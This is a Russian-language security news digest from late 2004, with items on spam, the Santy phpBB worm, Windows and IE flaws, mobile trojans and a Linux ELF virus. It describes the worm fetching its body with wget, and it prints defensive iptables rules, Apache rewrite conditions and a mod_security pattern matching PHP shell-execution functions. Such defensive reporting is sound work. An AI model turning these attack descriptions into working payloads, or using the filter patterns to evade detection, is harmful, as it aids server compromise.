Крупнейший мировой интернет-провайдер America Online (AOL) полагает, что нашел способ защиты своих клиентов от спама. В этом году они получили меньше рекламных писем по сравнению с прошлым, поясняет выводы провайдера агентство Associated Press. В ноябре этого года клиенты AOL ежедневно получали 1,6 миллиарда электронных писем. В ноябре прошлого года на адреса клиентов AOL каждый день приходило 2,1 миллиарда писем. Сокращение почтового потока произошло главным образом за счет спама, убеждены в America Online. Спамеры отказываются от отправки писем, осознавая, что их послания не проходят через почтовые фильтры AOL. Кроме того, спамеры опасаются судебных преследований за свою деятельность. Таково мнение руководства America Online, которое выразил пресс-секретарь компании Николас Грэхем. Число пользователей почтовых услуг AOL к сентябрю этого года сократилось до 22,7 миллиона человек по сравнению с 24,7 миллиона человек в сентябре прошлого года. Провайдер все-таки сумел остановить отток клиентов и зафиксировал снижение числа жалоб на спамеров на 75%. Специалисты America Online отметили не только уменьшение числа писем, задержанных общими почтовыми фильтрами компании, но и количество посланий, отсеянных фильтрами самих пользователей. Другие ведущие провайдеры электронных почтовых услуг — Yahoo!, EarthLink и Microsoft — не предоставили статистических данных о потоке спама в почте своих клиентов. По данным компании Postini, фильтрующей почту более чем 4 тысяч мелких провайдеров, спамеры предпочитают направлять свои послания клиентам небольших сетей.
VirusList

28/12/2004 10:53 Ученые построили компьютерную сеть, которую невозможно взломать
Несколько научных центров в мире занимаются в настоящее время разработкой технологии, которая позволит создавать абсолютно защищенные компьютерные сети, которые хакеры не смогут взломать. Как пишет во вторник газета Financial Times, речь идет о квантовой криптографии, с помощью которой предполагается шифровать информацию, после чего несанцкионированная ее расшифровка будет невозможна. Накануне первый опытный образец защищенной квантовой сети был создан в британском Кембридже специалистами компании Toshiba Research Europe. Ее возможности были протестированы на мощностях крупной телекоммуникационной компании MCI, и тест дал положительные результаты. Квантовые компьютерные технологии основаны на передаче данных с помощью фотонов (частиц света), которые хранят биты информации, положительно или отрицательно поляризуясь. Квантовые вычисления производятся с огромной скоростью, и технология квантовой криптографии позволяет менять криптографические ключи несколько раз в секунду. Как известно, хакеру, чтобы получить доступ к зашифрованной информации, необходимо подобрать криптографический ключ. В зависимости от сложности технологии шифрования ключ можно подбирать от нескольких минут до нескольких лет, при этом обычно требуются значительные компьютерные мощности. Чтобы попытаться подобрать все ключи к информации, зашифрованной квантовой криптографией, необходимы сроки, не совместимые с жизнью человека.
Подробности

27/12/2004 22:15 Уязвимоть в snort
Всё той же французской группой K-Otik обнаружена уязвимость в популярной IDS (система обнаружения попыток вторжения) Snort версии до 2.3.0-RC1. Удаленный атакующий может вызвать отказ в обслуживании системы. Уязвимость обнаружена в файле 'src/decode.c'. Удаленный атакующий может послать специально сформированный пакет и вызвать отказ в обслуживании системы. Группой подготовлен демонстрационный эксплоит.
Подробности

27/12/2004 19:54 Один из способов борьбы с PHP-червем
Новая модификация червя Santy.C, которую уже успели переименовать в PhpIncludeWorm, помимо форума phpBB обладает способностью заражения и других приложений PHP. Николай Малых - администратор форума Forum.Protocols.ru при обсуждении возможных вариантов защиты от червя с одним из модераторов этого же форума Phoenix пришёл к следующему варианту защиты - в качестве противодействия попыткам атаки рекомендуется использовать фильтрацию попыток организовать исходящие соединения с Web-сервера на граничном фильтре или самом сервере. Детали фильтрации зависят от конкретного использования хоста на котором работает Web-сервер. В простейшем случае можно просто заблокировать исходящие соединения со всех (или части) IP-адресов данного хоста.
Например, для блокировки всех исходящих соединений из подсети, где размещаются Web-серверы, с помощью межсетевого экрана на базе iptables можно использовать строку:
-A FORWARD -s подсеть Web -p tcp -m tcp -i eth0 --tcp-flags SYN SYN,ACK -j OpenToOutside.
При этом правило OpenToOutside обеспечивает отбрасывание пакетов и запись информации в журнальный файл системы:
-A OpenToOutside -j LOG --log-prefix "IPTABLES-OpenToOutside: " --log-level 4
-A OpenToOutside -j DROP.
Forum.Protocols.ru

27/12/2004 17:27 Беспроводные сети защитит краска
С распространением беспроводных сетей, известных своей уязвимостью, компании ИБ предлагают новые и всё более комплексные методики по их защите от взлома: пароли, шифрование, биометрическую аутентификацию. Блокирование радиоволн внутри офисного помещения или квартиры, являющееся более простой стратегией защиты, до последнего времени не получало достаточного распространения. Возможно, теперь это станет меняться. Продукт фирмы Force Field Wireless под названием DefendAir представляет собой латексную краску с примесью медных и аллюминиевых волокон, и при нанесении на твёрдую поверхность блокирует распространение радиосигнала. Краска, представленная в сером матовом цвете (вполне пригодном для основы), стоит $69 за галлон. Она эффективно защищает сети стандартов Wi-Fi, Wi-Max и Bluetooth, функционирующие на частотах от 100 МГц до 2.4 ГГц, от интерференции, внешнего прослушивания и активного вмешательства. Два-три слоя покрытия дают наилучшие результаты защиты для радиосигналов с частотой в пределах 5 ГГц. Помимо краски фирма предлагает схожего состава плёнку для окон по $39 за упаковку. Force Field Wireless рекомендует применять краску очень внимательно – радиоволны находят малейшие лазейки. Кроме того, следует обращать внимание, что покрытие может ухудшить приём телевизионного сигнала и затруднить работу мобильных телефонов.
PGP в России

27/12/2004 15:38 "Мобильный" спам - ПК отдыхают
Проблема спама на мобильные телефоны в нашей стране еще не приняла таких угрожающих масштабов, какие наблюдаются, например, в Южной Корее. Однако, как известно, только хорошие вещи внедряются с трудом, а гадость всегда быстро находит себе дорогу. Так что рапорт, обнародованный на днях южнокорейским государственным аналитическим агентством по безопасности информации с ласковым именем KISA (Korea Information Security Agency), возможно, в некоторой степени отражает и наше будущее. Аналитики из KISA отмечают значительный рост нежелательных текстовых сообщений и телефонных звонков, при этом, динамика роста мобильного спама значительно превышает такие же показатели по получению нежелательных писем через электронную почту на настольных ПК. Как выяснилось, количество жалоб на получение нежелательных сообщений по телефону составило в Южной Корее за первые 10 месяцев года более 244 тысяч, в то время как жалобы на традиционный спам составили 78 тысяч случаев. Поскольку тенденция рассылки мобильного спама начала проявлять себя ощутимо лишь в нынешнем году, аналитики KISA ожидают значительного роста жалоб в будущем. Для сравнения, в 2002 году зарегистрировано всего 4864 случая жалоб на мобильный спам. Предполагается, что с мобильными спаммерами будут бороться на государственном уровне, однако, уже сейчас корейские операторы связи принимают меры самостоятельно. Так, с начала года второй по величине оператор страны Hanaro Telecom уже отключил 130 спаммеров из своей сети. Мобильный спам имеет две разновидности - SMS-сообщения и голосовые звонки автоматических систем - ARS (automatic response system). Интересно отметить, что в Южной Корее для внесения жалоб о спаммерах существует специальный сервисный номер - 114.
Mobile-review

27/12/2004 15:15 LCP: новая версия
Вышла новая версия программы LCP, предназначенной для аудита и восстановления паролей Windows NT/2000/XP/2003, и известной ранее под названием LC+4, сообщает bugtraq.ru. Изменения:
- добавлена поддержка дополнительного шифрования учетных записей пользователей активизированной программой SYSKEY при выполнении импорта из реестра и импорта файла SAM;
- добавлена возможность импорта файлов сеансов LC5;
- появилась английская версия программы.
Страница проекта

27/12/2004 14:57 Вирусный "зал славы" 2004 от Panda Software
Антивирусная компания Panda Software опубликовала своеобразный хит-парад вирусов и троянов, которые в той или иной степени отличаются от остальных своих собратьев. 2004 год, пишет компания, был очень противоречивым годом относительно вирусной активности. В течение года были серьезные эпидемии, вызванные такими вирусами как Sasser или Mydoom. Мы также были свидетелями кибер-войн между группами вирусописателей, пытающихся распространить свои создания (например, Bagle и Netsky) по всему миру. Но были и моменты относительного затишья. Вирусы опубликованы в следующих номинациях:
Самый разрушительный - Sasser;
Самый сложный - Noomy.A;
Самый разговорчивый - Amus.A;
Самый музыкальный - некоторые варианты червя Netsky;
Самый скрытный - Bagle;
Вирус-полиглот - Zafi.D;
Самый неприличный - вирус Tasin.C;
Самый повторяющийся - cемейство сетевых червей Gaobot;
Самый шизофреничный - Bereb.C;
Самый вежливый - cразу три вируса - StartPage.AV, Harnig.B и Multidropper.AM.
Подробнее

27/12/2004 13:44 Распространитель червя Randex попадет за решетку, когда повзрослеет
Британский суд приговорил 16-летнего подростка к шести месяцам лишения свободы за создание интернет-червя Randex, который превращал зараженные компьютеры в машины для рассылки спама. Осужденный будет отбывать наказание после того, как достигнет совершеннолетия, сообщает сайт Vnunet.com. Арест юного британца стал результатом совместной операции Скотланд-Ярда, ФБР и канадской полиции. Сотрудники правоохранительных органов арестовали также двух американцев и канадца. «Юные члены этой группы были бы наказаны строже, если были бы старше на несколько лет», — прокомментировал ситуацию технологический консультант антивирусной компании Sophos Грэхем Клюли (Graham Cluley). Следствие по делу автора Randex началось после того, как в интернете были обнаружены сети зараженных компьютеров, предлагаемых на продажу спамерам и инициаторам DoS-атак. Все задержанные распространители Randex оказались несовершеннолетними.
Viruslist

27/12/2004 13:20 GPL-основу open source пора совершенствовать
Грядет модернизация General Public License, юридической основы, на которой зиждется большая часть проектов разработки free- и open-source программного обеспечения и которую так зло раскритиковал председатель правления Microsoft Билл Гейтс. Автор GPL Ричард Столлман работает над поправками, которые добавят лицензии определенности в отношении патентов на ПО; прояснят вопрос об использовании GPL-программ в некоторых сетевых средах и на строго контролируемом оборудовании; а также устранят преграды, которые сегодня мешают смешивать программное обеспечение, регламентируемое GPL и другими лицензиями. За 13 лет, прошедшие с момента появления существующей второй версии GPL, лицензия переместилась с периферии индустрии вычислительной техники к ее центру. Теперь программное обеспечение GPL широко применяется в компаниях Fortune 500 и внедрено в большинстве компьютерных фирм. Но этот успех вызвал потребность в некоторых изменениях. «GPL стала осью вращения многомиллиардной индустрии. Честно говоря, я не думаю, что она была на это рассчитана, — говорит Марк Радклифф, юрист из Gray Cary, досконально изучивший GPL и другие лицензии. Например, некоторым хотелось бы видеть уточнения, которые помогли бы уменьшить вероятность того, что использование ПО GPL может навлечь на пользователей обвинение в нарушении патентов. И GPL должна быть лучше приспособлена к отраслевым инициативам последнего времени, таким как создание развитых веб-сервисов в интернете и применение усиленных мер обеспечения безопасности. Обычно юридическими документами, регламентирующими использование программного обеспечения, интересуются только юристы. Но в случае GPL это не так. Эта лицензия представляет собой соглашение, которое убеждает в возможности кооперации в отрасли, где бал правит конкуренция. Наиболее наглядной иллюстрацией этого служит операционная система Linux, которая все больше угрожает таким гигантам, как Microsoft и Sun Microsystems.
ZDNet

27/12/2004 13:09 Федеральный закон не помешал США стать лидером по спаму
42% спама, полученного пользователями в этом году, отправлено из США, сообщает сайт CNET News.com со ссылкой на исследование компании Sophos. Эти цифры говорят о том, что американское антиспамерское законодательство просто не работает, отмечают в Sophos. «Когда мы опубликовали первый подобный отчет в феврале, США объяснили ситуацию тем, что их антиспамерский федеральный закон существует всего 3 месяца», — рассказал один из авторов исследования. Республика Корея стоит на втором месте в списке стран-спамеров. Оттуда выходит 13,43% всего мирового спама. На третьем месте находится Китай (8,44%). Далее следуют Канада (5,71%), Бразилия (3,34%), Япония (2,57%) Франция (1,37%) и Испания (около 1,18%). 1,13% спама приходится на долю Великобритании, 1,03% — на долю Германии, 1% — на долю Тайваня и 0,89% на долю Мексики. «Федеральный антиспамерский закон существует почти год, а спамеры по-прежнему отправляют миллионы сообщений. Вполне очевидно, что закон сделал крайне мало, чтобы остановить поток спама», — подчеркивают исследователи.
Источник

27/12/2004 12:27 Полиция Японии расследует дело о крупном интернет-мошенничестве
В Японии зафиксирован первый случай фишинга, в результате которого была похищена крупная сумма денег, сообщает The Japan Times. Национальное полицейское агенсво не разглашает подробности случившегося, однако известно, что дело по факту интернет-мошенничества было заведено в прошлом месяце и там фигурирует сумма в сотни тысячи иен. На данный момент ведутся работы, целью которых является доказать наличие мошеннического веб-сайта, где жертвы фишеров оставляли номера своих кредитных карт, пароли и аутентификационные данные. Как только доказательства будут собраны, виновные будут призваны к ответу. Скорее всего, это не единственный случай фишинга на территории страны, но безусловно первый, которым занялась местная полиция и котороый получил такой резонанс в кругах общественности. Волна фишинга уже давно захлестнула США и Европу и уловки фишеров становятся все более изощренными. Теперь японские финансовые учреждения будут принимать повышенные меры безопасности и информировать своих клиентов о возможных уловках мошенников. Жителям же страны рекомендовано проявлять повышенную бдительность и не отвечать на подозрительные электронные письма.
"Компьюлента"

27/12/2004 11:39 CD с опечатками пальцев всех граждан России могут появиться на пиратских рынках
В недрах нашего правительства родилась очередная безумная идея о том, как впустую потратить государственные деньги. Речь идет о т.н. законе по созданию государственного регистра населения (ГРН). Регистр будет содержать информацию о дате и месте рождения и биометрические данные граждан (отпечатки пальцев и образ радужной оболочки глаза).
С инициативой создания ГРН выступило Министерство информационных технологий и связи РФ (Мининформсвязи). Ответственность за формирование ГРН возложена на Федеральное агентство по информационным технологиям (Росинформтехнологии). Польза от принятия такого закона для органов следствия весьма и весьма сомнительна - профессиональные преступники вряд ли еще не научились не оставлять опечатков, а вот получить доступ к персональным данным граждан криминальные структуры будут не против, так же как и всевозможные иностранные разведки.
Что касается затрат, то они колоссальны - ведь далеко не самым дешевым оборудованием придется оснастить каждый паспортный стол.
Источник: www.cnews.ru

26/12/2004 16:49 Новая версия Santy поражает phpBB 2.0.11
Ранее указывалось, что продолжающаяся эпидемия червя Santy, атакующего форумы под управлением популярного скрипта phpBB, не затрагивает крайнюю версию этого продукта - 2.0.11. Однако, как стало известно, форумы под управлением и этой версии также взламываются новой версией червя Santy (Sanity в некоторых интерпретациях) - Santy.C. Как указывают исследователи компьютерной безопасности и пострадавшие, анализирующие логи поражённых Вэб-серверов, новая версия загружает собственной тело (Перл-скрипт) с сайта www.visualcoders.net, используя утилиту wget, присутствующую на большинстве UNIX-серверов, после чего скачивает своё тело и код IRC-бота, для запуска на сервере. При этом сам Apache (/usr/local/apache/bin/httpd) запускается с поддержкой SSL-протокола (по-идимому, для шифрации передаваемого трафика). Для поиска уязвимых форумов, как указывалось ранее, используется бразильский сервер Google (www.google.com.br). Кстати, в коде самого червя и бота (в комментариях и названиях переменных) явно прослеживается бразильский след и указание на Atrix Team.
Коды червя и бота
Описание технологии распространения и работы

26/12/2004 16:14 Первый IMAP сервер написанный с оглядкой на безопасность
Как известно, низкая безопасность главный недостаток современных открытых IMAP серверов (UW-IMAP, Courier, Cyrus), сообщает opennet.ru. Но похоже ситуация изменилась, после начала разработки IMAP сервера Dovecot, главной задачей которого является создание по настоящему безопасной реализации IMAP сервера. В настоящее время продукт уже достиг стадии позволяющей использовать его в "production" системах. Из возможностей можно отметить полную поддержку IMAP4rev1 (плюс реализация команд SORT и THREAD, которые часто используется в web-mail клиентах), работа с mailbox и maildir, низкие затраты ОЗУ и высокая производительность, понятный файл конфигурации, несколько уровней настроек работы в chroot, реализация поддержки TLS/SSL через библиотеку GNUTLS (возможна сборка с OpenSSL, но на безопасности это сказывается не лучшим образом).
Сайт проекта

26/12/2004 13:59 «Троянец» для мобильных телефонов маскируется под игру
Антивирусные эксперты зафиксировали появление новой версии вредоносной программы для мобильных телефонов, сообщает сайт Security Focus. Речь идет о троянце Trojan.SymbOS.Skuller, который на сей раз оказался замаскирован под игру Metal Gear Solid. В числе телефонов, уязвимых для этой программы, оказались аппараты производства компаний Nokia, Siemens, Panasonic и Sendo. По информации антивирусной компании SimWorks, новый троянец нейтрализует антивирусное программное обеспечение телефона. Новая версия Trojan.SymbOS.Skuller может самостоятельно распространяться, используя еще одну вредоносную программу для мобильных устройств — Cabir. Пользователям настоятельно рекомендуется не открывать файл MetalGear.sis, полученный с другого мобильного устройства. В противном случае вредоносная программа не только нейтрализует антивирусы, но и установит в аппарат червя Cabir и установочный файл SEXXXY.sis. SEXXXY.sis запускает код, который нейтрализует работу кнопки «Меню».
SecurityFocus

26/12/2004 13:56 ASPLinux анонсировала выход нового дистрибутива
Компания ASPLinux совместно с фирмой «1С» объявили о выходе нового дистрибутива ASPLinux под издательской маркой «1С:Дистрибьюция». Новая версия получила название «v10». При разработке ASPLinux v10 учитывалось, что дистрибутив будет устанавливаться не только на серверы, но и на настольные компьютеры, в том числе – и на домашние ПК. Поэтому при создании дистрибутива были реализованы такие возможности, как моментальная готовность к работе, простота конфигурирования. У продукта - широкие мультимедийные возможности: включенные в дистрибутив программы позволяют воспроизводить видео-диски DVD и MPEG-4 и аудио-файлы в формате МР3. В основу ASPLinux v10 лег репозитарий Fedora, создаваемый сообществом разработчиков под эгидой компании Red Hat. Выбор был обусловлен тем, что, по утверждению представителей ASPLinux, в настоящее время это наиболее качественный и быстро обновляющийся репозитарий. Как и предыдущая версия дистрибутива, ASPLinux v10 будет предлагаться пользователям в четырех вариантах. Наиболее полная коробочная версия ASPLinux v10 Deluxe предназначена для разработчика или системного администратора, подходит для установки на сервер, и на рабочую станцию. В поставку включен диск DVD с дистрибутивом, а так же ряд пакетов, не вошедших в состав основного дистрибутива. Вариант ASPLinux v10 Standard рекомендован для домашних пользователей, он также может использоваться как ПО для домашнего мультимедийного центра. Вариант ASPLinux v10 Express, рекомендован для пользователей, знакомых с ОС Linux и не нуждающихся в литературе или дополнительном ПО. И, наконец, вариант ASPLinux v10 Greenhorn – дает возможность любому пользователю познакомиться с ОС ASPLinux и работать в ней, не устанавливая на жесткий диск.
CNews

26/12/2004 11:33 Новый вирус для Linux
Производители антивирусных продуктов сообщают о появлении довольно любопытного вируса для ОС Linux. Собственно, он также может поразить и некоторые MacOS бинарные файлы, поскольку повреждает и внедряет своё тело в выполнимые файлы формата ELF (пришёл на смену формата COFF). По сообщению McAffee Inc. сам файл, который инициирует заражение, носит название "binom" и имеет размер 7390. После запуска этого файла (требуется непосредственной участие пользователя), он начинает сканировать систему и заражать другие ELF-файлы. Размер инфицированных файлов увеличивается на 4096 байт. Код вируса не изменяет ни точку входа (EP) виртуального адреса, ни смещение EP - вместо этого он дописывает своё тело в конец загружаемого сегмента. Внутри инфицироанного файла наблюдается строка " [ Cyneox/DCA ". Ввиду непосредственного участия пользователя для начала заражения (а процент глупости пользователей ОС Linux всё-таки существенно меньше, чем ОС "всех времён и народов"), вероятность заражения довольно низка. В антивирусных базах вирус получил название Linux.Binom (Symantec) и Linux.Nibom.A (ClamAV).
Описание вируса

26/12/2004 10:21 Уязвимость Internet Explorer
Несмотря на все усилия, которые Microsoft приложила к защите при выпуске SP2, исследователи компьютерной безопасности продолжают находить уязвимости в защите, применяемой этим патчем. Мы уже сообщали о наличии уязвимостей в защите локальной зоны безопасности. В частности, это касается ActiveX компоненты, связанной с системой помощи Windows Help (обход системы защиты и Cross Site Scripting). Использование этих уязвимостей позволяет полностью скомпрометироать уязвимую систему через Internet Explorer. Самое печальное, что для этого не требуется даже никаких действий со стороны незадачливого пользователя - достаточно посетить специальным образом оформленный сайт. Два исследователя компьютерной безопасности - Michael Evanchik и Paul from Greyhats подготовили специальный сценарий, применив который можно полностью скомпрометировать систему. В качестве меры противодействия приводятся следующие шаги: убрать поддержку .hta - файлов, использовать антивирусное ПО, убрать поддержку активного скриптинга в IE, перейти к использованию других браузеров.
Об уязимости в Internet Explorer

26/12/2004 09:54 В СНГ внедрят единую биометрическую инфосистему
Министры внутренних дел стран СНГ хотят внедрить на территории содружества единую биометрическую информационную систему. По мнению глав МВД, это наиболее действенный инструмент для решения вопросов борьбы с терроризмом. Предлагаемая для внедрения система была разработана в Казахстане и получила название "СНГ - ВИЗИТ". По словам министров, биометрическая информационная система позволяет выявлять незаконных мигрантов и лиц, находящихся в розыске, с вероятностью 90%. При этом процедура идентификации личности по изображению лица и отпечаткам пальцев занимает не более 5 секунд. Введение системы в действие предполагает формирование объединенной базы данных о лицах, представляющих оперативный интерес, и создает необходимые условия для внедрения биометрических паспортов в соответствии с международными стандартами. На прошедшем сегодня в Москве внеочередном Совете глав МВД стран - членов СНГ министры внутренних дел обратились к президенту Украины, председателю Совета глав государств СНГ Леониду Кучме с просьбой ввести "СНГ - ВИЗИТ" в действие.
Lenta.Ru

26/12/2004 09:21 Об очередных уязвимостях в семействе ОС Windows.
Как мы сообщали ранее, китайская команда Xfocus Team подготовила экспериментальные эксплоиты для обнаруженных этой группой уязвимостей в семействе ОС Windows. Речь идёт об ОС: Windows 2K, Windows XP SP1. На странице, приведённой ниже, описываются 4 уязвимости: в API LoadImage библиотеки USER32.dll, две уязвимости при разборе ядром системы ANI-файлов, возможность переполнения кучи и буфера при обработке границ winhlp32.exe. Авторами подготовлены демонстрации всех четырёх уязвимостей. Хотелось бы отметить, что наличие SP2 для XP защищает только от первых двух уязвимостей. 3 уязвимости имеют статус удалённых, что очень опасно, учитывая как обычную практику M$ выпускать зплаты раз в месяц, так и начавшиеся на Западе рожденственские каникулы. Несмотря на (если верить словам Сами_Знаете_Кого) якобы делающийся упор на безопасности выпускаемых M$ операционок, однако состояние её оставляет желать лучшего. Итак, скорее всего, можно сказать, что Microsoft войдёт в Новый Год с как минимум одной незалатанной дырой (это если не брать в расчёт уязвимости в браузере IE).
Уязвимости и эксплоиты

25/12/2004 23:09 PHP под прицелом
Новые модификации червя - SantyC и SantyB атакуют PHPbb. Используя бразильский Google, AOL и Yahoo они находят уязвимые системы, после чего подключаются к IRC-каналу, "где уже более 700 зомби ждут команды" (цитата из securityfocus). Кроме того, сообщается, что PHPbb, пропатченные до версии 2.0.11 подвержены атакам новых модификаций червя.
Подробнее
SantyC source
SantyB source
phpBB worm affects 2.0.11

25/12/2004 15:45 Безопасность непропатченных Linux-систем растет
Некоммерческий проект Honeypot Project, занимающийся подключением уязвимых систем к сети Интернет в целях обнаружения атак, которые в дальнейшем анализируются для исследования безопасности ИТ, пришел к выводу, что необновляемые Linux-системы спокойно живут в сети на протяжении месяцев, и только потом бывают взломаны. Причем это «время жизни» Linux значительно увеличивалось с 2001-2002 годов. По заявлению представителей проекта, два или три года назад в среднем непропатченную Linux-систему взламывали за 72 часа, а сейчас этот показатель вырос до трех месяцев. «Удивительно, но несмотря на то, что число сообщений об угрозах растет, мы наблюдаем рост защищенности Linux от случайных атак», — отмечается в сообщении группы.
Недавнее исследование honeypot-проекта AvanteGarde говорит о подобной статистике для Windows-систем: за последний месяц среднее время взлома многих версий Windows составило четыре минуты.
nixp.ru

25/12/2004 14:33 Выход Linux 2.6.10
Вышел новый релиз ядра ветки 2.6. Под изменение попало многое. В частности в очередной раз переделан framebuffer.
ChangeLog

25/12/2004 14:04 Новые бета-версии браузера Opera для Windows и Windows Mobile
Норвежская компания Opera объявила о выпуске бета-версий своих одноименных браузеров для портативных устройств и настольных компьютеров. Программный пакет Opera 7.60 for Windows Mobile, как отмечается в пресс-релизе, облает широким набором возможностей, высокой производительностью и поддерживает все основные веб-стандарты, в том числе CSS2, DOM 2 и JavaScript. Естественно, в браузере реализована фирменная технология SSR (Small-Screen Rendering), которая позволяет автоматически оптимизировать содержимое сайтов для их отображения на небольших по размеру экранах смартфонов. Выпуск окончательной версии Opera 7.60 for Windows Mobile запланирован на конец марта, а пока производитель предлагает всем желающим загрузить тестовую версию программы, в которой, впрочем, реализованы не все нововведения. Бета-версию браузера Opera 7.60 для настольных компьютеров с операционными системами Microsoft Windows также уже можно скачать с веб-сайта компании. По заявлениям производителя, браузер получил обновленный интерфейс и ряд дополнительных возможностей. В частности, называются система автоматической загрузки обновлений, улучшенная схема работы с каналами RSS, а также функции Fit-to-Window-Width и Fit-to-Paper-Width, которые форматируют загружаемую страницу таким образом, чтобы она полностью помещалась на дисплее или листе бумаги при распечатке. Наибольшего же внимания заслуживает система голосового управления, которая позволяет выполнять некоторые базовые действия, например, переходить по истории веб-страниц и осуществлять прокрутку при помощи голосовых команд. Кроме того, браузер Opera 7.60 способен зачитывать вслух содержимое веб-сайта.
Подробнее

25/12/2004 13:19 Обманутые червем
Эпидемия червя Santy так напугала некоторых владельцев сайтов, что у них началась настоящая паника. Они приняли заражение за хакерскую атаку и начали фантазировать, кому же понадобилось их взламывать. Как известно, во вторник в интернете началась массовая эпидемия червя PHP/Santy.A.worm. Он взламывал сайты, на которых было запущено популярное приложение phpBB версий, более ранних чем 2.0.11. Червь проникал только на непропатченные серверы, используя уязвимость, которая была обнаружена 15 ноября, и заменял файлы с расширениями .htm, .php, .asp, .shtm, .jsp, и .phtm. Для поиска новых «жертв» червь отправлял запросы на Google. Пока Google не начал отфильтровывать характерные запросы червя, тот успел заразить около 40.000 сайтов. Среди зараженных оказалось много российских ресурсов. Но здесь червя ждал сюрприз — его просто не узнали. Некоторые владельцы сайтов восприняли ситуацию явно неадекватно. Они мало того что не узнали PHP/Santy.A.worm, но и начали громко вопить, что их взломали хакеры, потому что их замечательные сайты якобы кому-то мешают, занимают видную роль на интернет-пространстве и т.д. «Хакеры прошлись по русской моде» — такие пугающие заголовки появились в прессе 22 декабря, когда о хакерской атаке заявили владельцы сайта Российской Недели Mоды (RFW). Хулиганская акция носила явно спланированный характер, считает Ирина Моргунова, директор RFW: «Взлом сайта — занятие довольно трудоемкое, интернет-ресурсов, „достойных“ внимания хакеров, предостаточно, но именно сайт RFW почему-то стал мишенью. Интересно, кому понадобилось выбивать RFW из интернет-поля?». Действительно, кому это могло понадобиться? Скорее всего, это был просто червь. Российским «модницам» вторят белорусские братья по разуму с сайта «Третий путь»: «Деятельность „Третьего Пути“ стала достаточно заметной, чтобы привлекать к себе внимание», — делают они многозначительный вывод в распространенном пресс-релизе. Вообще, непонятно, как можно перепутать червя и хакера, ведь PHP/Santy.A.worm оставляет ясное сообщение в тексте каждой подмененной страницы, указывая даже номер своей версии. Но чего не сделаешь ради возможности пропиариться? Сайт RFW до сих пор не восстановлен, хотя характерных для PHP/Santy.A.worm страниц с надписью «This site is defaced!!!» на нем нет. А вот поиск по Рунету выдает еще несколько сотен сайтов с узнаваемой фразой.
"Вебпланета"

25/12/2004 12:47 Для новой дыры в Windows уже подготовлен экспериментальный эксплоит
Группа китайских хакеров Xfocus Team опубликовала образец кода, который можно использовать для автоматизированной эксплуатации двух недавно обнаруженных уязвимостей в операционной системе Windows. Речь, как сообщает CNET со ссылкой на антивирусную компанию Symantec, идет, во-первых, о бреши в функции Loadimage, благодаря которой злоумышленник может захватить компьютер жертвы с помощью специальным образом обработанной картинки, размещенной в Сети или присланной по почте, и, во-вторых, о дырке в Windows Help, позволяющей захватывать чужие машины с помощью help-файлов. Эти дыры являются тем более опасными, что затрагивают практически все браузеры, почтовые клиенты и программы для работы с изображениями, работающие под Windows.
Internet.Ru

25/12/2004 12:30 Apple запатентовала iPod, который не боится падений
Компания Apple Computer подала заявку на патент, относящийся к технологии, которая позволит портативному медиаплееру обнаруживать, что он падает, и в этот момент прекращать чтение или запись на жесткий диск. Метод основан на измерении ускорения, которым сопровождается падение. «Портативное вычислительное устройство защищает свой дисковый накопитель, измеряя такие ускорения и стараясь избегать использования накопителя в периоды ускорения, — говорится в заявке, опубликованной 16 декабря. — Благодаря такой защите, можно существенно уменьшить вероятность разрушения накопителя или потери хранящихся в нем данных». IBM начала использовать аналогичные средства в своем семействе ноутбуков ThinkPad в октябре 2003 года. Заявка на патент Apple была подана в июне 2003 года, но опубликована только на прошлой неделе. Существуют и другие подходы к решению этой проблемы. Hitachi работает над тем, чтобы сделать кронштейн головок чтения/записи более коротким и подвижным. Это уменьшит вероятность выхода диска из строя в результате падения. Молодой производитель накопителей, компания Cornice рассказывала о планах выпуска 3-Гбайт 1-дюймового диска, у которого, когда диск не используется, кронштейн головок чтения/записи физически блокируется. Правда, это может не защитить диск, если во время падения устройства он выполнял операцию чтения или записи.
ZDNet

25/12/2004 11:15 Китай закрыл по доносам 1129 порносайтов
Власти Китая провели очередную операцию по закрытию интернет-сайтов, распространяющих запрещенную в стране информацию - в основном это порносайты и сайты различных религиозных объединений. Согласно опубликованному в пятницу отчету государственной организации "Центр контроля за вредной информацией", в рамках операции пресечена деятельность 1287 сайтов, из которых 1129 - порнографические, передает France-Presse. Как говорится в сообщении Центра, большинство сайтов были выявлены после сигналов, поступивших от пользователей. Информаторы получили денежные вознаграждения в размере от 500 юаней (60 долларов США) до 2000 юаней (241 доллар США). Это часть официальной кампании, названной властями "народной войной" с порнографией. Известно, что государство контролирует Интернет, и доступ к тем или иным сайтам из Китая может ограничиваться по указанию властей. Ранее в этом году ими была начата кампания по "очищению" китайского Интернета от запрещенных тем, так как их наличие там, по мнению властей, негативно влияет на моральный климат в обществе в целом и на молодежь в частности. По данным AFP, в Китае 87 миллионов интернет-пользователей, половина из которых - молодые люди младше 24 лет.
Lenta.Ru

24/12/2004 16:05 Варианты защиты от червя Sanity
В связи с появлением червя Sanity в BugtraQ развернулась дискуссия как об исходном коде и действиях червя, так и о защите от него. Raymond Dijkxhoorn, например, предложил защищать виртуальные хосты при помощи следующих директив Вэб-сервера Apache (разуммется - до обновления PHP):
RewriteEngine On
RewriteCond %{QUERY_STRING} ^(.*)echr(.*) [OR]
RewriteCond %{QUERY_STRING} ^(.*)esystem(.*)
RewriteRule ^.*$
Второй вариант защиты предложил Sebastian Wiesinger - но он связан с использованием модуля mod_security. Необходимо включить директиву: SecFilterSelective "THE_REQUEST" "(system|exec|passthru|popen|shell_exec|proc_open|fopen|fwrite)\s*\(".
SecurityFocus

24/12/2004 15:17 Исходный код червя Sanity
В Интернете продолжается эпидемия червя под названием Sanity, активно использующего недавно обнаруженную уязвимость PHP в функции unserialize() (используется для извлечения данных из cookies). Как мы сообщали, уязвимости подвержены многих PHP-скрипты. Однако достаётся по традиции больше всех phpBB, что, в первую очередь связано с распространённостью этого скрипта для построения различных форумов. Так вот - французской командой K-OTik был проведён анализ тела червя и опубликован его исходный код на Перле. Самое примечательное, что при распространении червь активно использует посиковый сервис неббеызвестного GOOGLE. При этом запрос формируется на основе поиска файла viewtopic.php.
Исходный код

24/12/2004 13:05 Cоздание аварийного CD для Solaris своими руками
На сайте linux.org.ru опубликован анонс довольно любопытной статьи, описывающей процесс создания аварийного загрузочного компакт-диска для операционной системы Sun Solaris, позволяющего, например, производить восстановление корневой файловой системы. Описываемый метод представляет собой альтернативу применению коммерческих продуктов, таких как VERITAS NetBackup, что может быть актуально ввиду планов по выпуску следующей версии Solaris под открытой лицензией.
Cтатья

24/12/2004 12:40 Расторопные киберсквоттеры
